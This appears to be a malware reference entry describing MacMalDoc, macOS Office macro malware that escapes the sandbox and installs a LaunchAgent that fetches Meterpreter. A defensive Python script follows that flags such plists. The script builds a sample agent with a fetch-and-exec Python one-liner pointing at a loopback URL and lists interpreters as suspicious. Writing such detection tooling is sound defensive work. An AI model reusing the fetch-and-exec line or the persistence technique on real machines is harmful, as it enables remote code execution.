MacMalDoc
MacMalDoc is the first known macOS malware that abuses MS Office for Mac to infect the system. The malware reuses the proof-of-concept (POC) code published by Adam Chester that escapes the MS Office sandbox in order to write a file to the system. When the document is opened and macros are enabled in Office, the malicious macro runs, escapes the Office sandbox and drops a file on disk. In this case the dropped file is a LaunchAgent plist, which runs a Python script that downloads the final payload:
Source: Objective-See
The final payload is Meterpreter, a Python agent generated by Metasploit that gives the attacker a remote shell and a large set of post-exploitation commands on the infected machine.
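The persistence step above (a LaunchAgent plist dropped through the Office sandbox escape, whose job is to run an interpreter that fetches the next stage) is the part a responder can hunt for on disk. The triage script below is an added example, not code from the sample or from Objective-See: it parses every plist in a LaunchAgents directory and flags two traits, a file name starting with `~$` (the prefix Adam Chester's published POC relies on, because the Office sandbox profile permits writing files matching that pattern) and a ProgramArguments entry that runs an interpreter or downloader instead of an application bundle. The sample plists, their labels, the loopback URL and the list of "suspicious" binaries are constructed for the example and should be tuned to your fleet's baseline.

```python
"""Triage macOS LaunchAgent plists for the drop pattern described above.

Added example (not the malware's or Objective-See's code). Flags:
  * plist file names beginning with "~$" (the prefix the Office-sandbox
    escape POC uses, since the sandbox allows writing such files);
  * agents whose first ProgramArguments element is an interpreter or
    fetcher (python, osascript, bash, curl ...) rather than an app bundle;
  * inline "-c" scripts, base64 blobs or URLs in the arguments, RunAtLoad.
"""
import os
import plistlib
import tempfile
from pathlib import Path

# Assumption: these are unusual as the primary executable of a user
# LaunchAgent on a managed fleet; adjust to your own baseline.
SUSPICIOUS_BINARIES = {
    "python", "python2", "python3", "osascript",
    "bash", "sh", "zsh", "perl", "curl",
}


def triage_plist(path):
    """Return a list of reasons this LaunchAgent looks suspicious (empty = nothing found)."""
    path = Path(path)
    reasons = []
    if path.name.startswith("~$"):
        reasons.append("file name uses Office '~$' prefix (sandbox-escape drop pattern)")
    try:
        with open(path, "rb") as fh:
            data = plistlib.load(fh)
    except Exception as exc:  # malformed or non-plist content is itself worth a look
        return reasons + [f"unparseable plist: {exc}"]

    # launchd accepts either ProgramArguments (list) or Program (single path).
    args = data.get("ProgramArguments") or ([data["Program"]] if "Program" in data else [])
    if not args:
        return reasons + ["no ProgramArguments/Program key"]

    exe = os.path.basename(args[0])
    if exe in SUSPICIOUS_BINARIES:
        reasons.append(f"runs interpreter/fetcher {exe!r}")
    joined = " ".join(args)
    if "-c" in args or "base64" in joined or "http" in joined:
        reasons.append("inline script, encoded blob or URL in arguments")
    if data.get("RunAtLoad"):
        reasons.append("RunAtLoad=true")
    return reasons


def triage_dir(directory):
    """Map each *.plist in directory to its list of findings."""
    return {p.name: triage_plist(p) for p in sorted(Path(directory).glob("*.plist"))}


def build_sample_dir():
    """Construct a temporary LaunchAgents directory with one benign and one
    malicious-looking agent (both fabricated for this example)."""
    d = Path(tempfile.mkdtemp(prefix="launchagents-"))
    benign = {
        "Label": "com.example.updater",
        "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/updater", "--check"],
        "StartInterval": 3600,
    }
    # Stand-in for the dropped agent: a Python one-liner that pulls a stager
    # from a (loopback, constructed) URL at every login.
    dropped = {
        "Label": "com.example.dropped",
        "ProgramArguments": [
            "/usr/bin/python", "-c",
            "import urllib2;exec(urllib2.urlopen('http://127.0.0.1/stage').read())",
        ],
        "RunAtLoad": True,
    }
    with open(d / "com.example.updater.plist", "wb") as fh:
        plistlib.dump(benign, fh)
    with open(d / "~$com.example.dropped.plist", "wb") as fh:
        plistlib.dump(dropped, fh)
    return d


if __name__ == "__main__":
    # On a real host point this at ~/Library/LaunchAgents instead.
    for name, findings in triage_dir(build_sample_dir()).items():
        print(name, "->", findings or "ok")
```

Run it against `~/Library/LaunchAgents` (and `/Library/LaunchAgents`) on a suspect host; a clean agent yields an empty list, while the dropped one is reported for the `~$` name, the Python interpreter, the inline `-c` script with a URL, and `RunAtLoad`. The name check is the cheapest signal and is specific to this escape technique; the argument checks are generic and will also surface legitimate admin scripts, so treat them as triage hints rather than verdicts.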
Links:
Samples:
70778374164075298aba2194c0c7bb1d08bde7f4